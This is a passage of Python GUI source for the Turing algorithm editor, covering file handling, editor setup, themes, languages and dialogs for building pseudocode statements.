GuiState.ui.actionDebug.setDisabled(False) set_current_line(ExecState.worker.last) ExecState.skip_step = True ExecState.worker.finished = False ExecState.worker.stopped = False else: if not user_stop: end_output() GuiState.ui.actionNew.setDisabled(False) GuiState.ui.actionOpen.setDisabled(False) GuiState.ui.actionRun.setDisabled(False) GuiState.ui.actionStep.setDisabled(False) GuiState.ui.actionDebug.setDisabled(False) GuiState.ui.actionStop.setEnabled(False) ExecState.running = False def load_python_code(): import autopep8 py_code = autopep8.fix_code("\n".join(AppState.algo.python())) GuiState.code_editor.setPlainText(py_code.replace("\t", " "), "", "") def handler_ConvertToPython(): load_python_code() AppState.mode_python = True AppState.current_file = None refresh() def algo_run_python(): load_python_code() AppState.mode_python = True handler_Run() AppState.mode_python = False # GuiState.code_editor.setPlainText("", "", "") def handler_AboutTuring(): import forms.about forms.about.AboutWindow(GuiState.window, util.__version__, util.__channel__).run() def handler_Examples(): """ callback function for actionExamples. Let the user choose one example file, providing some metadata about examples to make an easier choice. """ msg = msg_box_info(translate("MainWindow", "You are about to choose an example file\nfrom the `examples` directory. To guess what examples are,\nyou can guess from the file names.")) msg.exec_() data_dirs = ["/usr/share/turing/", os.path.dirname(os.path.realpath(__file__)), os.path.dirname(os.path.dirname(os.path.realpath(__file__))), os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))] + \ QStandardPaths.standardLocations(QStandardPaths.DataLocation) + \ QStandardPaths.standardLocations(QStandardPaths.AppDataLocation) data_dirs = [os.path.join(x, "examples") for x in data_dirs] handler_Open(whichDir=first_found_dir(data_dirs)) return def set_show_toolbar(show): if show: GuiState.ui.toolBar.show() else: GuiState.ui.toolBar.hide() util.settings.setValue("show_toolbar", show) GuiState.ui.actionShowToolbar.setChecked(show) def handler_ShowToolbar(): set_show_toolbar(not GuiState.ui.toolBar.isVisible()) def set_show_toolbar_text(show): if show: GuiState.ui.toolBar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon) else: GuiState.ui.toolBar.setToolButtonStyle(Qt.ToolButtonIconOnly) util.settings.setValue("show_toolbar_text", show) GuiState.ui.actionShowToolbarText.setChecked(show) def handler_ShowToolbarText(): set_show_toolbar_text(GuiState.ui.toolBar.toolButtonStyle() == Qt.ToolButtonIconOnly) def save(filename): if AppState.mode_python: ExecState.last_saved = str(GuiState.code_editor.toPlainText()) else: ExecState.last_saved = repr(AppState.algo) with open(filename, "w+", encoding="utf8") as savefile: savefile.write(ExecState.last_saved) recent_add(filename) refresh() def save_output(): file = QFileDialog.getSaveFileName(GuiState.window, translate("MainWindow", "Save output"), "", translate("MainWindow", "Text files (*.txt)"))[0] if not file: return with open(file, "w+", encoding="utf8") as savefile: savefile.write(GuiState.ui.txtOutput.toPlainText()) def handler_SaveAs(): file = QFileDialog.getSaveFileName(GuiState.window, translate("MainWindow", "Save"), "", GuiState.filters[["tr", "py"][AppState.mode_python]])[0] if not file: return AppState.current_file = file handler_Save() def handler_Save(): if not AppState.current_file: handler_SaveAs() return try: save(AppState.current_file) except PermissionError: msg = msg_box_info( translate("MainWindow", "You are not allowed to write to {},\nplease choose another file path.").format( AppState.current_file)) msg.exec_() handler_SaveAs() return def handler_Open(whichDir=""): """ callback function to open a file @param whichDir the directory to browse initially """ sel_file, _ = QFileDialog.getOpenFileName( GuiState.window, translate("MainWindow", "Open"), whichDir or "", ";;".join(GuiState.filters.values())) if not sel_file: return load_file(sel_file) def load_file(file): AppState.current_file = file _, ext = os.path.splitext(AppState.current_file.lower()) with open(AppState.current_file, "r", encoding="utf8") as openfile: newcode = openfile.read() if ext == ".alg": from algo.frontends.algobox import parse_algobox AppState.mode_python = False load_block(parse_algobox(newcode)) ExecState.last_saved = repr(AppState.algo) elif ext == ".tr": AppState.mode_python = False load_pseudocode(newcode) ExecState.last_saved = repr(AppState.algo) elif ext == ".py": AppState.mode_python = True GuiState.code_editor.setPlainText(newcode, "", "") ExecState.last_saved = newcode recent_add(AppState.current_file) set_correct_tab() refresh() def set_correct_tab(): GuiState.ui.tabWidget.setCurrentIndex(2 if AppState.mode_python else 1) def handler_New(): if is_modified(): msg = msg_box( translate("MainWindow", "Do you really want to create a new file?\nAll unsaved changes will be lost."), parent=GuiState.window) if msg.exec_() != QMessageBox.Yes: return AppState.current_file = None AppState.algo = BlockStmt([]) GuiState.code_editor.setPlainText("", "", "") set_correct_tab() refresh() def handler_ZoomIn(): if AppState.mode_python: GuiState.code_editor.zoom_in() else: set_algo_size(GuiState.ui.treeWidget.font().pointSize() + 1) def handler_ZoomOut(): if AppState.mode_python: GuiState.code_editor.zoom_out() else: set_algo_size(GuiState.ui.treeWidget.font().pointSize() - 1) def handler_ResetZoom(): if AppState.mode_python: GuiState.code_editor.reset_zoom() else: set_algo_size(GuiState.algo_base_font.pointSize()) def set_algo_size(size): if size < 1: size = 1 set_font_size(GuiState.ui.treeWidget, size) for idstmt, (item, stmt) in GuiState.item_map.items(): set_font_size(item, size, 0) if hasattr(item, "lbl"): set_font_size(item.lbl, size) def init_action_handlers(): for item in dir(GuiState.ui): if item.startswith("action"): name = "handler_" + item[6:] if name in globals(): getattr(GuiState.ui, item).triggered.connect(globals()[name]) def copy_action(source: QAction, target: QAction): target.setText(source.text()) target.setIcon(source.icon()) target.triggered.disconnect() target.triggered.connect(source.trigger) def load_languages(): def gen(loc): return lambda: change_language(loc) it = QDirIterator(":/lang/media/lang") while it.hasNext(): cur = it.next() locale_name, _ = os.path.splitext(os.path.basename(cur)) locale = QLocale(locale_name) act = QAction(GuiState.window) act.setCheckable(True) act.setIcon(QIcon(cur)) act.setText(locale.nativeLanguageName()) act.triggered.connect(gen(locale_name)) GuiState.ui.menuLanguage.addAction(act) GuiState.lng_actions[locale_name] = act def fix_tabwidget_width(): GuiState.ui.tabWidget_2.setMinimumWidth( sum(GuiState.ui.tabWidget_2.tabBar().tabRect(x).width() for x in range(GuiState.ui.tabWidget_2.count()))) GuiState.ui.widget.setMinimumWidth(0) GuiState.ui.widget.setMaximumWidth(16777215) GuiState.ui.widget.adjustSize() width = max(GuiState.window.width() / 3, GuiState.ui.widget.width()) GuiState.ui.widget.setMinimumWidth(width) GuiState.ui.widget.setMaximumWidth(width) def refresh_locs(): for act in GuiState.ui.menuChangeTheme.actions(): if act.statusTip(): act.setText(theming.themes[act.statusTip()][0]()) def change_language(language: str): available = GuiState.lng_actions.keys() if language not in available: if util.get_short_lang(language) in available: language = util.get_short_lang(language) else: language = "en" translator.load(language) GuiState.ui.menubar.resizeEvent(QResizeEvent(GuiState.ui.menubar.size(), GuiState.ui.menubar.size())) load_editor_actions() for l, a in GuiState.lng_actions.items(): a.setChecked(l == language) fix_qt_shitty_margins() fix_tabwidget_width() if sys.platform in ["darwin", "linux"]: GuiState.ui.menuLanguage.setTitle(QLocale(language).nativeLanguageName()) if util.settings.value("load_articles", False, type=bool): thr = article_update_text_begin() else: article_init_button() refresh_locs() refresh() if util.settings.value("load_articles", False, type=bool): article_update_text_end(thr) def send_user_input(): ExecState.user_input = GuiState.ui.txtInput.text() def clear_output(): ExecState.current_output = "" if not AppState.mode_python: set_current_line(None) update_output() plot_reset() def print_output(): print(dir(GuiState.code_editor)) p = QGuiApplication.palette() print(p.color(QPalette.Window).name()) print(p.color(QPalette.WindowText).name()) print(p.color(QPalette.Disabled, QPalette.WindowText).name()) print(p.color(QPalette.Base).name()) print(p.color(QPalette.AlternateBase).name()) print(p.color(QPalette.ToolTipBase).name()) print(p.color(QPalette.ToolTipText).name()) print(p.color(QPalette.Text).name()) print(p.color(QPalette.Disabled, QPalette.Text).name()) print(p.color(QPalette.Dark).name()) print(p.color(QPalette.Shadow).name()) print(p.color(QPalette.Button).name()) print(p.color(QPalette.ButtonText).name()) print(p.color(QPalette.Disabled, QPalette.ButtonText).name()) print(p.color(QPalette.BrightText).name()) print(p.color(QPalette.Link).name()) print(p.color(QPalette.Highlight).name()) print(p.color(QPalette.Disabled, QPalette.Highlight).name()) print(p.color(QPalette.HighlightedText).name()) print(p.color(QPalette.Disabled, QPalette.HighlightedText).name()) theming.themes["devtest"] = (theming.themes["devtest"][0], GuiState.code_editor.toPlainText().split("\n")) set_theme("devtest") pass def load_editor_actions(): for ours, theirs in GuiState.editor_action_table: copy_action(getattr(GuiState.ui, "action" + ours), getattr(GuiState.code_editor, "action_" + theirs)) # edge cases copy_action(GuiState.ui.actionFind, GuiState.panel_search.menu.menuAction()) GuiState.code_editor._sub_menus["Advanced"].setTitle(translate("MainWindow", "Advanced")) GuiState.mode_zoom.mnu_zoom.setTitle(translate("MainWindow", "Zoom")) GuiState.panel_folding.context_menu.setTitle(translate("MainWindow", "Folding")) GuiState.panel_folding.context_menu.actions()[0].setText(translate("MainWindow", "Collapse")) GuiState.panel_folding.context_menu.actions()[1].setText(translate("MainWindow", "Expand")) GuiState.panel_folding.context_menu.actions()[3].setText(translate("MainWindow", "Collapse all")) GuiState.panel_folding.context_menu.actions()[4].setText(translate("MainWindow", "Expand all")) GuiState.mode_ext_select.action_select_word.setText(translate("MainWindow", "Select word")) GuiState.mode_ext_select.action_select_extended_word.setText(translate("MainWindow", "Select extended word")) GuiState.mode_ext_select.action_select_matched.setText(translate("MainWindow", "Matched select")) GuiState.mode_ext_select.action_select_line.setText(translate("MainWindow", "Select line")) GuiState.mode_ext_select.action_select_line.associatedWidgets()[0].setTitle(translate("MainWindow", "Select")) GuiState.panel_search.labelSearch.setPixmap(GuiState.ui.actionFind.icon().pixmap(16, 16)) GuiState.panel_search.labelSearch.setMaximumSize(QSize(16, 16)) GuiState.panel_search.labelReplace.setPixmap(GuiState.ui.actionReplace.icon().pixmap(16, 16)) GuiState.panel_search.labelReplace.setMaximumSize(QSize(16, 16)) GuiState.panel_search.toolButtonPrevious.setIcon(QIcon(":/action/media/up.png")) GuiState.panel_search.toolButtonNext.setIcon(QIcon(":/action/media/down.png")) GuiState.panel_search.toolButtonClose.setIcon(QIcon(":/action/media/cross.png")) GuiState.panel_search.checkBoxRegex.setText(translate("MainWindow", "Regex")) GuiState.panel_search.checkBoxCase.setText(translate("MainWindow", "Match case")) GuiState.panel_search.checkBoxWholeWords.setText(translate("MainWindow", "Whole words")) GuiState.panel_search.checkBoxInSelection.setText(translate("MainWindow", "In Selection")) GuiState.panel_search.labelMatches.setText(translate("MainWindow", "0 matches")) GuiState.panel_search.toolButtonReplace.setText(translate("MainWindow", "Replace")) GuiState.panel_search.toolButtonReplaceAll.setText(translate("MainWindow", "Replace All")) GuiState.panel_search.lineEditSearch.prompt_text = translate("MainWindow", "Find") GuiState.panel_search.lineEditSearch.button.setIcon(QIcon(":/action/media/backspace.png")) GuiState.panel_search.lineEditSearch.button.setMinimumSize(QSize(21, 21)) GuiState.panel_search.lineEditReplace.prompt_text = translate("MainWindow", "Replace") GuiState.panel_search.lineEditReplace.button.setIcon(QIcon(":/action/media/backspace.png")) def copy_actions_to_editor(panel): for name, obj in panel.__dict__.items(): if name.startswith("action_"): setattr(GuiState.code_editor, name, obj) elif name.startswith("action"): # workaround for shitty naming by the devs setattr(GuiState.code_editor, "action_" + name[6:], obj) def set_theme(theme): if theme not in theming.themes or not theming.themes[theme][1]: theme = "default" util.settings.setValue("app_theme", theme) theming.load_theme(theme) for act in GuiState.ui.menuChangeTheme.actions(): act.setChecked(act.statusTip() == theme) refresh_algo() def set_style(style): util.settings.setValue("editor_style", style) GuiState.syntax_highlighter.pygments_style = style for act in GuiState.ui.menuChangeStyle.actions(): act.setChecked(act.text() == style) def load_code_editor(): GuiState.code_editor = api.CodeEdit() if hasattr(sys, "frozen"): print("using external backend") if sys.platform == "win32": backend = "editor_backend.exe" elif sys.platform.startswith("linux"): backend = "editor_backend" elif sys.platform == "darwin": backend = "editor_backend" backend = os.path.join(sys._MEIPASS, backend) else: print("using script file") while not async_imported("editor_backend"): QCoreApplication.processEvents() backend = globals()["editor_backend"].__file__ GuiState.code_editor.backend.start(backend) GuiState.code_editor.modes.append(modes.CodeCompletionMode()) GuiState.code_editor.modes.append(modes.CaretLineHighlighterMode()) GuiState.code_editor.modes.append(modes.AutoCompleteMode()) GuiState.code_editor.modes.append(modes.IndenterMode()) GuiState.code_editor.modes.append(modes.AutoIndentMode()) GuiState.code_editor.modes.append(modes.OccurrencesHighlighterMode()) GuiState.code_editor.modes.append(modes.SmartBackSpaceMode()) GuiState.code_editor.modes.append(modes.SymbolMatcherMode()) GuiState.mode_zoom = modes.ZoomMode() GuiState.code_editor.modes.append(GuiState.mode_zoom) GuiState.code_editor.action_zoom_in = GuiState.mode_zoom.mnu_zoom.actions()[0] GuiState.code_editor.action_zoom_out = GuiState.mode_zoom.mnu_zoom.actions()[1] GuiState.code_editor.action_reset_zoom = GuiState.mode_zoom.mnu_zoom.actions()[2] GuiState.mode_ext_select = GuiState.code_editor.modes.append(modes.ExtendedSelectionMode()) GuiState.syntax_highlighter = GuiState.code_editor.modes.append( modes.PygmentsSyntaxHighlighter(GuiState.code_editor.document())) GuiState.syntax_highlighter.fold_detector = api.IndentFoldDetector() GuiState.panel_folding = GuiState.code_editor.panels.append(panels.FoldingPanel()) GuiState.code_editor.panels.append(panels.LineNumberPanel()) GuiState.code_editor.modes.append(modes.CheckerMode(pyqode.python.backend.run_pep8)) GuiState.code_editor.panels.append(panels.GlobalCheckerPanel(), panels.GlobalCheckerPanel.Position.LEFT) GuiState.panel_search = GuiState.code_editor.panels.append(panels.SearchAndReplacePanel(), api.Panel.Position.BOTTOM) GuiState.panel_search._update_label_matches_orig = GuiState.panel_search._update_label_matches def wrapper(): GuiState.panel_search._update_label_matches_orig() if GuiState.panel_search.labelMatches.text(): GuiState.panel_search.labelMatches.setText( translate("MainWindow", "{num} matches").format(num=GuiState.panel_search.cpt_occurences)) GuiState.panel_search._update_label_matches = wrapper copy_actions_to_editor(GuiState.panel_search) GuiState.code_editor.textChanged.connect(refresh) load_editor_actions() def gen(s): return lambda: set_style(s) for style in pygments.styles.get_all_styles(): action = QAction(GuiState.window) action.setText(style) action.setCheckable(True) action.triggered.connect(gen(style)) GuiState.ui.menuChangeStyle.addAction(action) GuiState.syntax_highlighter.pygments_style = util.settings.value("editor_style", "default") set_style(GuiState.syntax_highlighter.pygments_style) GuiState.ui.verticalLayout_8.addWidget(GuiState.code_editor) def load_plot_canvas(): GuiState.plot_figure = Figure() GuiState.plot_axes = GuiState.plot_figure.add_subplot(111) GuiState.plot_canvas = FigureCanvas(GuiState.plot_figure) plot_reset() GuiState.ui.verticalLayout_4.addWidget(GuiState.plot_canvas) def get_item_label(item): def gen_func(item): return lambda: GuiState.ui.treeWidget.setCurrentItem(item) txt = QClickableLabel() txt.setStyleSheet(GuiState.ui.treeWidget.styleSheet()) txt.clicked.connect(gen_func(item)) txt.dclicked.connect(algo_double_click) item.lbl = txt GuiState.ui.treeWidget.setItemWidget(item, 0, txt) return txt def get_item_html(html, data=""): item = QTreeWidgetItem() item.setStatusTip(0, data) item.setFont(0, GuiState.ui.treeWidget.font()) lbl = get_item_label(item) lbl.setFont(item.font(0)) lbl.setText(label_format % html) item.setSizeHint(0, lbl.sizeHint()) GuiState.ui.treeWidget.setItemWidget(item, 0, lbl) return item, lbl def refresh_algo_text(): for item, stmt in GuiState.item_map.values(): lbl = get_item_label(item) lbl.setText(label_format % str_stmt(stmt)) def add_display(): from forms import alg_display dlg = alg_display.AlgoDisplayStmt(GuiState.window) if dlg.run(): append_line(DisplayStmt(dlg.expr, dlg.newline)) def add_def_variable(): from forms import alg_define dlg = alg_define.AlgoDefineStmt(GuiState.window) if dlg.run(): append_line(AssignStmt(dlg.varname, dlg.expr)) def add_input(): from forms import alg_input dlg = alg_input.AlgoInputStmt(GuiState.window) if dlg.run(): append_line(InputStmt(dlg.varname, dlg.expr, dlg.text)) def add_call(): from forms import alg_call dlg = alg_call.AlgoCallStmt(GuiState.window) if dlg.run(): append_line(CallStmt(dlg.func, dlg.args)) def add_def_func(): from forms import alg_func dlg = alg_func.AlgoFuncStmt(GuiState.window) if dlg.run(): append_line(FuncStmt(dlg.func, dlg.args, [])) def add_return(): from forms import alg_return dlg = alg_return.AlgoReturnStmt(GuiState.window) if dlg.run(): append_line(ReturnStmt(dlg.expr)) def add_if_block(): from forms import alg_if dlg = alg_if.AlgoIfStmt(GuiState.window) if dlg.run(): append_line(IfStmt(dlg.expr, [])) def add_else_block(): append_line(ElseStmt([])) def add_for_loop(): from forms import alg_for dlg = alg_for.AlgoForStmt(GuiState.window) if dlg.run(): append_line(ForStmt(dlg.varname, dlg.f_from, dlg.f_to, [], dlg.f_step)) def add_while_loop(): from forms import alg_while dlg = alg_while.AlgoWhileStmt(GuiState.window) if dlg.run(): append_line(WhileStmt(dlg.expr, [])) def add_gclear(): append_line(GClearStmt()) def add_gline(): from forms import alg_gline dlg = alg_gline.AlgoGLineStmt(GuiState.window) if dlg.run(): append_line(GLineStmt(dlg.f_start_x, dlg.f_start_y, dlg.f_end_x, dlg.f_end_y, dlg.f_color)) def add_gpoint(): from forms import alg_gpoint dlg = alg_gpoint.AlgoGPointStmt(GuiState.window) if dlg.run(): append_line(GPointStmt(dlg.f_x, dlg.f_y, dlg.f_color)) def add_gwindow(): from forms import alg_gwindow dlg = alg_gwindow.AlgoGWindowStmt(GuiState.window) if dlg.run(): append_line(GWindowStmt(dlg.f_x_min, dlg.f_x_max, dlg.f_y_min, dlg.f_y_max, dlg.f_x_grad, dlg.f_y_grad)) def add_gfunc(): from forms import alg_gfunc dlg = alg_gfunc.AlgoGFuncStmt(GuiState.window) if dlg.run(): append_line(GFuncStmt(dlg.f_variable, dlg.f_function, dlg.f_start, dlg.f_end, dlg.f_step, dlg.f_color)) def add_break_stmt(): append_line(BreakStmt()) def add_continue_stmt(): append_line(ContinueStmt()) def add_stop_stmt(): from forms import alg_stop dlg = alg_stop.AlgoStopStmt(GuiState.window) if dlg.run(): append_line(StopStmt(dlg.expr)) def add_sleep_stmt(): from forms import alg_sleep dlg = alg_sleep.AlgoSleepStmt(GuiState.window) if dlg.run(): append_line(SleepStmt(dlg.expr)) def add_comment_stmt(): from forms import alg_comment dlg = alg_comment.AlgoCommentStmt(GuiState.window) if dlg.run(): append_line(CommentStmt(dlg.comment)) def btn_dupl_line(): stmt = get_current_stmt() if isinstance(stmt, IfStmt): current_pos = get_current_pos() _, parent_stmt = get_parent(current_pos) if current_pos[-1] + 1 < len(parent_stmt.children) and isinstance(parent_stmt.children[current_pos[-1] + 1], ElseStmt): append_line(eval(repr(parent_stmt.children[current_pos[-1] + 1])), True) append_line(eval(repr(stmt)), True) def btn_delete_line(): current_pos = get_current_pos() _, parent_stmt = get_parent(current_pos) if isinstance(parent_stmt.children[current_pos[-1]], IfStmt) and current_pos[-1] < len( parent_stmt.children) - 1 and isinstance(parent_stmt.children[current_pos[-1] + 1], ElseStmt): del parent_stmt.children[current_pos[-1] + 1] del parent_stmt.children[current_pos[-1]] refresh() def btn_edit_line(): stmt = get_current_stmt() if isinstance(stmt, DisplayStmt): from forms import alg_display dlg = alg_display.AlgoDisplayStmt(GuiState.window, (stmt.content.code(), stmt.newline)) if dlg.run(): stmt.content = dlg.expr stmt.newline = dlg.newline elif isinstance(stmt, CallStmt): from forms import alg_call dlg = alg_call.AlgoCallStmt(GuiState.window, (stmt.function.code(), [x.code() for x in stmt.arguments])) if dlg.run(): stmt.function = dlg.func stmt.arguments = dlg.args elif isinstance(stmt, AssignStmt): from forms import alg_define dlg = alg_define.AlgoDefineStmt(GuiState.window, (stmt.variable.code(), stmt.value.code())) if dlg.run(): stmt.variable = dlg.varname stmt.value = dlg.expr elif isinstance(stmt, ReturnStmt): from forms import alg_return dlg = alg_return.AlgoReturnStmt(GuiState.window, stmt.value.code() if stmt.value is not None else None) if dlg.run(): stmt.value = dlg.expr elif isinstance(stmt, StopStmt): from forms import alg_stop dlg = alg_stop.AlgoStopStmt(GuiState.window, stmt.message.code() if stmt.message is not None else None) if dlg.run(): stmt.message = dlg.expr elif isinstance(stmt, SleepStmt): from forms import alg_sleep dlg = alg_sleep.AlgoSleepStmt(GuiState.window, stmt.duration.code()) if dlg.run(): stmt.duration = dlg.expr elif isinstance(stmt, InputStmt): from forms import alg_input dlg = alg_input.AlgoInputStmt(GuiState.window, (stmt.variable.code(), stmt.prompt.code() if stmt.prompt is not None else None, stmt.text)) if dlg.run(): stmt.variable = dlg.varname stmt.prompt = dlg.expr stmt.text = dlg.text elif isinstance(stmt, IfStmt): from forms import alg_if dlg = alg_if.AlgoIfStmt(GuiState.window, stmt.condition.code()) if dlg.run(): stmt.condition = dlg.expr elif isinstance(stmt, WhileStmt): from forms import alg_while dlg = alg_while.AlgoWhileStmt(GuiState.window, stmt.condition.code()) if dlg.run(): stmt.condition = dlg.expr elif isinstance(stmt, ForStmt): from forms import alg_for dlg = alg_for.AlgoForStmt(GuiState.window, ( stmt.variable, stmt.begin.code(), stmt.end.code(), stmt.step.code() if stmt.step is not None else None)) if dlg.run(): stmt.variable = dlg.varname stmt.begin = dlg.f_from stmt.end = dlg.f_to stmt.step = dlg.f_step elif isinstance(stmt, FuncStmt): from forms import alg_func dlg = alg_func.AlgoFuncStmt(GuiState.window, (stmt.name, stmt.parameters)) if dlg.run(): stmt.name = dlg.func stmt.parameters = dlg.args elif isinstance(stmt, CommentStmt): from forms import alg_comment dlg = alg_comment.AlgoCommentStmt(GuiState.window, stmt.content) if dlg.run(): stmt.content = dlg.comment elif isinstance(stmt, GLineStmt): from forms import alg_gline dlg = alg_gline.AlgoGLineStmt(GuiState.window, ( stmt.start_x.code(), stmt.start_y.code(), stmt.end_x.code(), stmt.end_y.code(), stmt.color.code())) if dlg.run(): stmt.start_x = dlg.f_start_x stmt.start_y = dlg.f_start_y stmt.end_x = dlg.f_end_x stmt.end_y = dlg.f_end_y stmt.color = dlg.f_color elif isinstance(stmt, GPointStmt): from forms import alg_gpoint dlg = alg_gpoint.AlgoGPointStmt(GuiState.window, (stmt.x.code(), stmt.y.code(), stmt.color.code())) if dlg.run(): stmt.x = dlg.f_x stmt.y = dlg.f_y stmt.color = dlg.f_color elif isinstance(stmt, GWindowStmt): from forms import alg_gwindow dlg = alg_gwindow.AlgoGWindowStmt(GuiState.window, ( stmt.x_min.code(), stmt.x_max.code(), stmt.y_min.code(), stmt.y_max.code(), stmt.x_grad.code(), stmt.y_grad.code())) if dlg.run(): stmt.x_min = dlg.f_x_min stmt.x_max = dlg.f_x_max stmt.y_min = dlg.f_y_min stmt.y_max = dlg.f_y_max stmt.x_grad = dlg.f_x_grad stmt.y_grad = dlg.f_y_grad elif isinstance(stmt, GFuncStmt): from forms import alg_gfunc dlg = alg_gfunc.AlgoGFuncStmt(GuiState.window, ( stmt.var, stmt.expr.code(), stmt.start.code(), stmt.end.code(), stmt.step.code(), stmt.color.code())) if dlg.run(): stmt.var = dlg.f_variable stmt.expr = dlg.f_function stmt.start = dlg.f_start stmt.end = dlg.f_end stmt.step = dlg.f_step stmt.color = dlg.f_color refresh() def btn_move_up_block(): btn_move_up(True) def btn_move_up(block=False): current_pos = get_current_pos() _, parent_stmt = get_parent(current_pos) current_pos[-1] -= 1 if current_pos[-1] < 0: current_pos.pop() else: if not block: existing = parent_stmt.children[current_pos[-1]] if isinstance(existing, BlockStmt): current_pos.append(len(existing.children)) move_line(get_current_pos(), current_pos) def btn_move_down_block(): btn_move_down(True) def btn_move_down(block=False): current_pos = get_current_pos() _, parent_stmt = get_parent(current_pos) current_pos[-1] += 1 if current_pos[-1] >= len(parent_stmt.children): current_pos.pop() current_pos[-1] += 1 else: if not block: existing = parent_stmt.children[current_pos[-1]] if isinstance(existing, BlockStmt): current_pos.append(0) move_line(get_current_pos(), current_pos) def append_line(stmt, force_after=False): current_pos = get_current_pos() _, parent_stmt = get_parent(current_pos) if current_pos: existing = parent_stmt.children[current_pos[-1]] if type(existing) == BaseStmt: parent_stmt.children[current_pos[-1]] = stmt refresh() return else: existing = AppState.algo if force_after and isinstance(existing, IfStmt) and current_pos[-1] + 1 < len(parent_stmt.children) and isinstance( parent_stmt.children[current_pos[-1] + 1], ElseStmt): current_pos[-1] += 1 if not force_after and isinstance(existing, BlockStmt) \ and not (isinstance(stmt, ElseStmt) and isinstance(existing, IfStmt)): current_pos.append(len(existing.children)) else: current_pos[-1] += 1 add_line(current_pos, stmt) if isinstance(stmt, BlockStmt): add_block(stmt, current_pos) set_current_stmt(stmt) def get_current_stmt(): current_item = GuiState.ui.treeWidget.currentItem() if current_item is not None: for item, stmt in GuiState.item_map.values(): if item == current_item: return stmt return AppState.algo def get_current_pos(): current = [] found = False current_stmt = get_current_stmt() def find_block(block: BlockStmt): nonlocal found if found: return nonlocal current current.append(0) for child in block.children: if child == current_stmt: found = True return if isinstance(child, BlockStmt): find_block(child) if found: return current[-1] += 1 current.pop() if current_stmt is not None: find_block(AppState.algo) return current def get_parent(pos): parent = GuiState.root_item parent_stmt = AppState.algo for p in pos[:-1]: parent = parent.child(p) parent_stmt = parent_stmt.children[p] return parent, parent_stmt def set_current_stmt(current): if current is None: return for item, stmt in GuiState.item_map.values(): if stmt == current: GuiState.ui.treeWidget.setCurrentItem(item) break def refresh_algo(): current = None line = GuiState.ui.treeWidget.currentItem() for item, stmt in GuiState.item_map.values(): if item == line: current = stmt break load_block(AppState.algo) set_current_stmt(current) def move_line(old_pos, new_pos): _, old_parent_stmt = get_parent(old_pos) _, new_parent_stmt = get_parent(new_pos) line = old_parent_stmt.children[old_pos[-1]] del old_parent_stmt.children[old_pos[-1]] new_parent_stmt.children.insert(new_pos[-1], line) refresh() def add_line(pos, stmt, add=True): parent, parent_stmt = get_parent(pos) item, lbl = get_item_html(str_stmt(stmt)) parent.insertChild(pos[-1], item) if add: parent_stmt.children.insert(pos[-1], stmt) store_line(item, stmt) GuiState.ui.treeWidget.setItemWidget(item, 0, lbl) def handler_UseArrowNotation(): util.settings.setValue("use_arrow_notation", GuiState.ui.actionUseArrowNotation.isChecked()) refresh_algo() def set_load_recent_articles(val): GuiState.ui.actionLoadRecentArticles.setChecked(val) util.settings.setValue("load_articles", val) def handler_LoadRecentArticles(): set_load_recent_articles(GuiState.ui.actionLoadRecentArticles.isChecked()) def handler_CheckForUpdates(): util.settings.setValue("check_for_updates", GuiState.ui.actionCheckForUpdates.isChecked()) if GuiState.ui.actionCheckForUpdates.isChecked(): run_updater() def str_stmt(stmt): code = lambda stmt: stmt.code(True) if isinstance(stmt, DisplayStmt): ret = translate("Algo", "[k]DISPLAY[/k] [c]{val}[/c] {newline}").format(val=code(stmt.content), newline="↵" if stmt.newline else "") elif isinstance(stmt, BreakStmt): ret = translate("Algo", "[k]BREAK[/k]") elif isinstance(stmt, ContinueStmt): ret = translate("Algo", "[k]CONTINUE[/k]") elif isinstance(stmt, ElseStmt): ret = translate("Algo", "[b]ELSE[/b]") elif isinstance(stmt, WhileStmt): ret = translate("Algo", "[b]WHILE[/b] [c]{cond}[/c]").format(cond=code(stmt.condition)) elif isinstance(stmt, IfStmt): ret = translate("Algo", "[b]IF[/b] [c]{cond}[/c]").format(cond=code(stmt.condition)) elif isinstance(stmt, InputStmt): ret = translate("Algo", "[k]INPUT[/k] [c]{prompt}[/c] [k]TO[/k] [c]{var}[/c] {text}").format( prompt="" if stmt.prompt is None else stmt.prompt.code(True), var=code(stmt.variable), text="⌘" if stmt.text else "") elif isinstance(stmt, AssignStmt): if stmt.value is None: ret = translate("Algo", "[k]DECLARE[/k] [c]{var}[/c]").format(var=stmt.variable) else: ret = (translate("Algo", "[c]{var}[/c] [k]&#129128;[/k] [c]{value}[/c]") if GuiState.ui.actionUseArrowNotation.isChecked() else translate("Algo", "[k]VARIABLE[/k] [c]{var}[/c] [k]TAKES VALUE[/k] [c]{value}[/c]")).format( var=code(stmt.variable), value=code(stmt.value)) elif isinstance(stmt, CallStmt): ret = translate("Algo", "[k]CALL[/k] [c]{code}[/c]").format(code=code(stmt.to_node())) elif isinstance(stmt, ForStmt): ret = translate("Algo", "[b]FOR[/b] [c]{var}[/c] [b]FROM[/b] [c]{begin}[/c] [b]TO[/b] [c]{end}[/c] {step}").format( var=stmt.variable, begin=code(stmt.begin), end=code(stmt.end), step="" if stmt.step is None else translate("Algo", "([b]STEP[/b] [c]{step}[/c])").format( step=code(stmt.step))) elif isinstance(stmt, FuncStmt): ret = translate("Algo", "[b]FUNCTION[/b] [c]{func}({args})[/c]").format(func=stmt.name, args=", ".join(stmt.parameters)) elif isinstance(stmt, ReturnStmt): ret = translate("Algo", "[k]RETURN[/k] [c]{val}[/c]").format( val="" if stmt.value is None else code(stmt.value)) elif isinstance(stmt, StopStmt): ret = translate("Algo", "[k]STOP[/k] [c]{val}[/c]").format( val="" if stmt.message is None else code(stmt.message)) elif isinstance(stmt, SleepStmt): ret = translate("Algo", "[k]WAIT[/k] [c]{val}[/c] [k]SECONDS[/k]").format(val=code(stmt.duration)) elif isinstance(stmt, CommentStmt): ret = "[t]{com}[/t]".format(com=util.html.sanitize(stmt.content)) elif isinstance(stmt, GClearStmt): ret = translate("Algo", "[k]CLEAR PLOT[/k]") elif isinstance(stmt, GLineStmt): ret = translate("Algo", "[k]DRAW LINE[/k] [c]{color}[/c] [k]FROM[/k] ([c]{start_x}[/c]; [c]{start_y}[/c]) [k]TO[/k] ([c]{end_x}[/c]; [c]{end_y}[/c])").format( color=code(stmt.color), start_x=code(stmt.start_x), start_y=code(stmt.start_y), end_x=code(stmt.end_x), end_y=code(stmt.end_y) ) elif isinstance(stmt, GPointStmt): ret = translate("Algo", "[k]DRAW POINT[/k] [c]{color}[/c] [k]AT[/k] ([c]{x}[/c]; [c]{y}[/c])").format( color=code(stmt.color), x=code(stmt.x), y=code(stmt.y), ) elif isinstance(stmt, GWindowStmt): ret = translate("Algo", "[k]SET 